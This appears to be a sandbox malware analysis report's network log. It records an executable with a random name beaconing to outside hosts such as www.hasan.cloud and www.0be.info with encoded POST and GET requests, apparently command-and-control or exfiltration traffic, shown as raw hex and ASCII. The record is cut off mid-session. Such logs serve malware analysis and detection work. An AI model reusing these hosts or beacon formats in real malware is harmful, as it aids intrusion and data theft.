                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=adSmNktWpLTAXUHEC0JV%2F00WnQwDDeyVMLNfRsbj3EBI%2Bt8PuZez1AfURSKE4iJS2VpXo2C7lzJwGkOJlI619kmm6TuEgR3OvFdW5r%2B7ADpoz65tN6Ea%2BpZXgvc5roTZ9clc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 900394a49ea60f36-EWR
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1435&min_rtt=1435&rtt_var=717&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10804&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                      Data Raw: 65 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 29 ea 81 c3 6a 25 68 52 b5 52 28 11 b8 07 8e 06 6f e5 4a 6d 9c d8 5b 22 fe 1e 25 15 12 d7 99 37 a3 19 ba ab 5e d7 f6 a3 ad 61 6b 5f 1a 68 0f cf cd 6e 0d 8b 7b c4 5d 6d 37 88 95 ad 6e ce 43 51 22 d6 fb 05 1b 0a 7a 39 33 05 71 9e 0d e9 49 cf c2 ab 72 05 fb a8 b0 89 d7 ce 13 de 44 43 38 43 f4 19 fd cf 94 5b f2 3f 26 2c d9 50 cf 36 08 24 19 ae 92 55 3c 1c de 1a 18 5d 86 2e 2a 1c 27 0e 62 07 1a 4e 19 b2 a4 6f 49 05 61 3f 35 25 36 e4 bc 4f 92 33 3f f5 ee 2b 08 bc cf 00 38 85 71 1c 8b 8b cb 2a 69 18 8a 3e 45 68 63 52 78 2c 09 ff 22 86 70 de 44 38 7f f9 05 00 00 ff ff e3 02 00 2a 59 1a 36 06 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: e0LN0Dw)j%hRR(oJm["%7^ak_hn{]m7nCQ"z93qIrDC8C[?&,P6$U<].*'bNoIa?5%6O3?+8q*i>EhcRx,"pD8*Y60


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      4192.168.2.449745104.21.80.1804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:36:44.484575987 CET439OUTGET /vfw3/?sTS=rqg4sojPN1HzbyOnDHJ3Cr7oIHIM290cauZgTy6bg/7NgADr7OmLN934TwPzSFzjuedcHscZgYNpl4RBVJqUXd9S1SYp7SdNfp3f2O4BoE1UQty0MmYBNPM=&fd=Cr_TAhTpvZaLf HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.masterqq.pro
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Jan 11, 2025 09:36:45.094115973 CET1065INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:36:45 GMT
                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cpqFH0MV3vAGIoiCJ5EB22Ee7XKFmQG%2FjQlyFjxA2nZqD6FnQezO4TL7XkPVtcnMvZuCWWQ6YwejTqlHRcYiIBU%2FeCX3NekvsksSKGgfBmLL%2BcdB3qWbGm8oKwC9tHTU1IoC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 900394b489137d0e-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1904&min_rtt=1904&rtt_var=952&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=439&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                      Data Raw: 31 30 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 61 73 74 65 72 71 71 2e 70 72 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 105<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.masterqq.pro Port 80</address></body></html>10


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      5192.168.2.44975713.248.169.48804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:36:50.246267080 CET699OUTPOST /ve8l/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.hasan.cloud
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.hasan.cloud
                                                                                                                                      Referer: http://www.hasan.cloud/ve8l/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 37 41 72 59 4f 33 37 4b 64 4e 56 2f 74 7a 54 5a 4d 79 33 59 64 30 5a 62 32 64 5a 30 36 37 48 38 56 44 62 76 56 33 53 47 5a 38 4e 54 6b 78 49 2b 41 4a 77 63 44 6a 47 2b 62 75 44 38 51 4d 4f 6a 49 43 76 4a 44 56 33 56 46 67 75 62 4d 4c 4b 63 72 76 67 74 74 33 6a 68 50 35 56 33 67 39 71 4e 72 68 4a 59 58 51 72 4f 76 34 31 6f 55 61 7a 41 4f 2b 4d 34 31 4a 52 4b 73 39 6f 7a 44 51 4c 77 76 46 58 71 33 4d 54 76 2f 56 72 69 53 41 7a 71 58 78 6e 69 73 4d 45 58 7a 4d 70 38 36 69 61 63 76 76 30 61 70 79 58 6d 78 76 48 69 78 4f 6d 66 6b 2b 2f 47 70 44 45 48 46 41 37 4a 59 59 44 2b 75 77 3d 3d
                                                                                                                                      Data Ascii: sTS=7ArYO37KdNV/tzTZMy3Yd0Zb2dZ067H8VDbvV3SGZ8NTkxI+AJwcDjG+buD8QMOjICvJDV3VFgubMLKcrvgtt3jhP5V3g9qNrhJYXQrOv41oUazAO+M41JRKs9ozDQLwvFXq3MTv/VriSAzqXxnisMEXzMp86iacvv0apyXmxvHixOmfk+/GpDEHFA7JYYD+uw==
                                                                                                                                      Jan 11, 2025 09:36:50.703704119 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                      content-length: 0
                                                                                                                                      connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      6192.168.2.44977413.248.169.48804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:36:52.789062023 CET719OUTPOST /ve8l/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.hasan.cloud
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.hasan.cloud
                                                                                                                                      Referer: http://www.hasan.cloud/ve8l/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 37 41 72 59 4f 33 37 4b 64 4e 56 2f 73 51 4c 5a 41 7a 33 59 63 55 5a 55 35 39 5a 30 6a 72 48 43 56 44 6e 76 56 32 6d 73 5a 75 70 54 6b 52 34 2b 42 4d 63 63 41 6a 47 2b 54 4f 44 35 64 73 4f 6f 49 43 6a 42 44 58 54 56 46 6a 53 62 4d 4a 69 63 71 59 55 75 75 48 6a 6a 41 5a 56 31 39 74 71 4e 72 68 4a 59 58 51 4f 70 76 34 64 6f 55 76 6a 41 4f 63 30 33 72 5a 52 4a 38 4e 6f 7a 4f 77 4c 30 76 46 58 55 33 4a 79 4b 2f 58 6a 69 53 46 58 71 55 6a 50 39 6d 4d 45 52 33 4d 6f 56 71 58 7a 53 32 74 78 71 68 68 33 36 38 37 62 76 30 49 72 46 31 50 65 52 37 44 67 30 59 48 79 39 56 62 2b 33 31 34 38 48 53 76 64 6c 78 2f 62 47 42 37 48 66 75 59 57 63 54 37 49 3d
                                                                                                                                      Data Ascii: sTS=7ArYO37KdNV/sQLZAz3YcUZU59Z0jrHCVDnvV2msZupTkR4+BMccAjG+TOD5dsOoICjBDXTVFjSbMJicqYUuuHjjAZV19tqNrhJYXQOpv4doUvjAOc03rZRJ8NozOwL0vFXU3JyK/XjiSFXqUjP9mMER3MoVqXzS2txqhh3687bv0IrF1PeR7Dg0YHy9Vb+3148HSvdlx/bGB7HfuYWcT7I=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      7192.168.2.44978813.248.169.48804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:36:55.333189011 CET10801OUTPOST /ve8l/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.hasan.cloud
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.hasan.cloud
                                                                                                                                      Referer: http://www.hasan.cloud/ve8l/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 37 41 72 59 4f 33 37 4b 64 4e 56 2f 73 51 4c 5a 41 7a 33 59 63 55 5a 55 35 39 5a 30 6a 72 48 43 56 44 6e 76 56 32 6d 73 5a 75 68 54 6b 43 77 2b 42 76 6b 63 42 6a 47 2b 51 4f 44 34 64 73 4f 31 49 43 37 2f 44 58 65 6f 46 6d 65 62 4f 6f 43 63 74 70 55 75 31 33 6a 6a 59 70 56 6f 67 39 71 55 72 68 35 63 58 51 2b 70 76 34 64 6f 55 75 54 41 5a 65 4d 33 70 5a 52 4b 73 39 6f 2f 44 51 4b 72 76 46 65 76 33 4a 2b 30 34 6e 44 69 54 6a 33 71 53 51 6e 39 71 4d 45 54 36 73 6f 4e 71 58 33 5a 32 74 73 54 68 67 54 41 38 38 7a 76 31 39 32 34 79 75 71 4b 70 51 49 76 4f 31 57 61 65 35 65 6e 78 6f 77 4e 44 39 4a 6d 68 37 4b 6b 50 62 36 48 39 71 76 66 47 4f 55 35 31 6d 36 4d 72 32 44 4a 50 77 45 4c 57 69 4c 75 32 4d 69 2b 6d 43 30 4d 77 56 52 6a 73 6e 69 38 4e 68 66 6e 71 6b 69 4e 35 4e 4d 75 4f 2b 41 52 4c 39 43 6f 31 61 35 54 70 2f 7a 37 4a 32 4b 59 50 71 57 67 54 53 7a 52 57 51 46 73 59 2b 32 44 45 4e 7a 4c 33 35 54 48 72 6c 45 76 76 66 6a 72 50 58 4a 6d 55 35 43 43 42 55 53 4d 47 75 2f 57 2f 70 44 2b 79 6d [TRUNCATED]
                                                                                                                                      Data Ascii: sTS=7ArYO37KdNV/sQLZAz3YcUZU59Z0jrHCVDnvV2msZuhTkCw+BvkcBjG+QOD4dsO1IC7/DXeoFmebOoCctpUu13jjYpVog9qUrh5cXQ+pv4doUuTAZeM3pZRKs9o/DQKrvFev3J+04nDiTj3qSQn9qMET6soNqX3Z2tsThgTA88zv1924yuqKpQIvO1Wae5enxowND9Jmh7KkPb6H9qvfGOU51m6Mr2DJPwELWiLu2Mi+mC0MwVRjsni8NhfnqkiN5NMuO+ARL9Co1a5Tp/z7J2KYPqWgTSzRWQFsY+2DENzL35THrlEvvfjrPXJmU5CCBUSMGu/W/pD+ymLRRLk4sNaUChPW1GhZd/OXm6xWJjIvxbVBCeJt+vYsYgUW85OFnq/ZtrVwksi8SivnSu34juln9cRhrCGAWqawDLGdKPgXVYPPZcaJ157gTsJSWApO/mC3rCLzz5B1Y1s/Spmj9Jj3/A5hDCbhXna72Qibs5+qiwGA6T7l4HlRU/M81OIWSpesxGx1OJqS1aKU2JMpEAxFB/Bl0Vvutef/O9pThXZHQFSYC/HZEJEooUd9DuA6WEP8EHF+MWg8m+uf8L0VmkXLNoxN+QG4M5gqOmRQQgQl+im6FmaEcbGkhtgq9kRkKm1V+vrfU9Bga14w/jmAfWlkh0WLRuqtGBOsZ3slcuL8NuQ3iUYptYbG2mDye0RX180ieXquqs85qyoT/aJqHdfBH5vLxDvxXVyzMRHlMkZSxKWJhP8nqE8NR6ng6j7ZG2JPd2e4V5MKU7j6YwsfyBUosPRLiwY1g4jPee3juOzXI6PxqzBbfSikIOVdkgD1ToVbjDCe/j7Ge8UlyeEbdFxKe0BkMsDn6owd4ZveCeReD8jR4QlSI48wBitrbBlaKqoS6CElVEnlHlLLCwfqPl44eLVefKh7wN6J31QUsuByR/vH3YAwr6PoPMlH/FkbbIg7LxSdX7v9OAoHyo73/bv31axKS13EQvm2pnzkI13ydGpV [TRUNCATED]
                                                                                                                                      Jan 11, 2025 09:36:55.796694994 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                      content-length: 0
                                                                                                                                      connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      8192.168.2.44980313.248.169.48804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:36:57.920348883 CET438OUTGET /ve8l/?fd=Cr_TAhTpvZaLf&sTS=2CD4NCzEaM98tRHxByL6CBkb+r1SrLrNZhOfTEabPOsm5z4GKvQfPi2Ic9iPSKmuH0LkAH7bJGGmIcrctbsX23D3J9NSlYassghIEyGyoqU/M/j1A+InoJ8= HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.hasan.cloud
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Jan 11, 2025 09:37:06.343494892 CET377INHTTP/1.1 200 OK
                                                                                                                                      content-type: text/html
                                                                                                                                      date: Sat, 11 Jan 2025 08:37:06 GMT
                                                                                                                                      content-length: 256
                                                                                                                                      connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 66 64 3d 43 72 5f 54 41 68 54 70 76 5a 61 4c 66 26 73 54 53 3d 32 43 44 34 4e 43 7a 45 61 4d 39 38 74 52 48 78 42 79 4c 36 43 42 6b 62 2b 72 31 53 72 4c 72 4e 5a 68 4f 66 54 45 61 62 50 4f 73 6d 35 7a 34 47 4b 76 51 66 50 69 32 49 63 39 69 50 53 4b 6d 75 48 30 4c 6b 41 48 37 62 4a 47 47 6d 49 63 72 63 74 62 73 58 32 33 44 33 4a 39 4e 53 6c 59 61 73 73 67 68 49 45 79 47 79 6f 71 55 2f 4d 2f 6a 31 41 2b 49 6e 6f 4a 38 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?fd=Cr_TAhTpvZaLf&sTS=2CD4NCzEaM98tRHxByL6CBkb+r1SrLrNZhOfTEabPOsm5z4GKvQfPi2Ic9iPSKmuH0LkAH7bJGGmIcrctbsX23D3J9NSlYassghIEyGyoqU/M/j1A+InoJ8="}</script></head></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      9192.168.2.449886173.0.157.187804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:37:11.400544882 CET690OUTPOST /5m3m/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.0be.info
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.0be.info
                                                                                                                                      Referer: http://www.0be.info/5m3m/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 68 63 59 6f 43 4c 61 6c 43 6c 4e 49 6a 63 52 6e 5a 39 35 4e 42 6b 32 46 55 42 38 55 6e 65 7a 79 37 50 35 76 79 4f 4e 6f 55 4a 77 34 63 48 4e 65 4b 61 4e 67 75 54 54 46 54 71 4f 48 38 4a 6e 59 65 58 43 33 67 57 71 6a 36 73 50 4b 4f 4b 77 2b 4a 43 31 7a 6b 42 57 6b 54 35 66 72 68 53 54 2f 79 41 64 30 53 46 75 63 76 64 38 56 42 68 57 66 77 68 50 70 58 6b 69 51 72 69 59 79 65 52 64 55 65 6f 71 51 32 6e 4a 35 6c 43 66 58 4e 79 6f 47 36 42 73 63 70 43 6e 4c 6c 2b 69 4c 37 73 4d 55 46 45 69 33 48 66 74 4c 38 6a 61 65 6e 33 4b 59 50 71 6a 33 30 37 33 49 45 79 64 65 35 41 52 34 4d 51 3d 3d
                                                                                                                                      Data Ascii: sTS=hcYoCLalClNIjcRnZ95NBk2FUB8Unezy7P5vyONoUJw4cHNeKaNguTTFTqOH8JnYeXC3gWqj6sPKOKw+JC1zkBWkT5frhST/yAd0SFucvd8VBhWfwhPpXkiQriYyeRdUeoqQ2nJ5lCfXNyoG6BscpCnLl+iL7sMUFEi3HftL8jaen3KYPqj3073IEyde5AR4MQ==
                                                                                                                                      Jan 11, 2025 09:37:12.018016100 CET262INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Sat, 11 Jan 2025 08:37:11 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, private
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      Data Raw: 32 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 f3 c9 cc cb 56 c8 2c 56 48 ad 28 c8 2c 4a 4d 01 00 e1 b0 96 c8 0f 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 23V,VH(,JM0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      10192.168.2.449903173.0.157.187804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:37:13.943309069 CET710OUTPOST /5m3m/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.0be.info
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.0be.info
                                                                                                                                      Referer: http://www.0be.info/5m3m/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 68 63 59 6f 43 4c 61 6c 43 6c 4e 49 6a 38 42 6e 61 65 68 4e 51 30 32 47 58 42 38 55 6f 2b 79 35 37 50 46 76 79 50 34 7a 58 37 55 34 63 6d 64 65 59 4f 5a 67 69 7a 54 46 4c 36 4f 4f 34 4a 6e 48 65 58 50 4b 67 58 6d 6a 36 73 62 4b 4f 4a 6b 2b 4a 7a 31 77 6c 52 57 6d 66 5a 66 6c 75 79 54 2f 79 41 64 30 53 42 2b 36 76 64 6b 56 42 52 6d 66 77 41 50 6d 4a 55 69 54 6d 79 59 79 55 78 64 51 65 6f 71 75 32 69 68 58 6c 41 6e 58 4e 32 73 47 35 55 41 44 79 79 6e 4a 37 4f 69 61 71 76 56 41 4a 52 4c 30 5a 2f 5a 56 38 52 69 44 6d 78 48 43 65 62 43 67 6d 37 54 37 5a 31 55 71 30 44 73 78 58 52 47 41 49 6b 75 6c 74 33 77 46 6c 7a 47 71 35 35 77 75 61 72 45 3d
                                                                                                                                      Data Ascii: sTS=hcYoCLalClNIj8BnaehNQ02GXB8Uo+y57PFvyP4zX7U4cmdeYOZgizTFL6OO4JnHeXPKgXmj6sbKOJk+Jz1wlRWmfZfluyT/yAd0SB+6vdkVBRmfwAPmJUiTmyYyUxdQeoqu2ihXlAnXN2sG5UADyynJ7OiaqvVAJRL0Z/ZV8RiDmxHCebCgm7T7Z1Uq0DsxXRGAIkult3wFlzGq55wuarE=
                                                                                                                                      Jan 11, 2025 09:37:14.551887989 CET262INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Sat, 11 Jan 2025 08:37:14 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, private
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      Data Raw: 32 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 f3 c9 cc cb 56 c8 2c 56 48 ad 28 c8 2c 4a 4d 01 00 e1 b0 96 c8 0f 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 23V,VH(,JM0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      11192.168.2.449923173.0.157.187804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:37:16.538211107 CET10792OUTPOST /5m3m/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.0be.info
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.0be.info
                                                                                                                                      Referer: http://www.0be.info/5m3m/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 68 63 59 6f 43 4c 61 6c 43 6c 4e 49 6a 38 42 6e 61 65 68 4e 51 30 32 47 58 42 38 55 6f 2b 79 35 37 50 46 76 79 50 34 7a 58 37 63 34 63 57 42 65 4b 38 78 67 6a 7a 54 46 56 71 4f 4c 34 4a 6d 62 65 58 48 4f 67 58 62 63 36 75 6a 4b 50 70 34 2b 41 68 64 77 73 52 57 6d 58 35 66 6f 68 53 53 6e 79 45 41 63 53 46 69 36 76 64 6b 56 42 53 75 66 35 78 50 6d 4c 55 69 51 72 69 59 45 65 52 63 46 65 73 47 59 32 69 74 70 6b 77 48 58 4d 53 49 47 2f 6d 59 44 2b 79 6e 50 36 4f 6a 48 71 76 70 32 4a 56 54 65 5a 39 35 7a 38 53 2b 44 6b 6d 71 55 47 70 71 43 33 6f 76 44 45 31 34 50 30 77 63 71 62 41 4f 35 62 6c 2b 62 74 31 77 30 70 43 76 5a 39 34 77 62 41 75 56 56 57 75 49 2f 47 52 68 6b 67 6e 4f 36 6f 48 4e 38 31 50 69 50 70 4b 45 79 4c 30 6c 79 66 4a 43 78 5a 2b 4e 43 4d 30 4d 4f 57 53 43 4e 42 54 47 70 64 57 53 74 6b 4c 57 6f 51 51 5a 4d 77 72 42 43 62 61 51 4e 2f 6f 7a 4b 4f 41 7a 44 4e 31 34 4a 74 6b 74 45 63 47 34 45 33 62 75 6f 67 6d 6a 49 57 68 6f 38 75 62 78 66 45 59 72 33 35 73 43 50 51 61 57 35 33 47 [TRUNCATED]
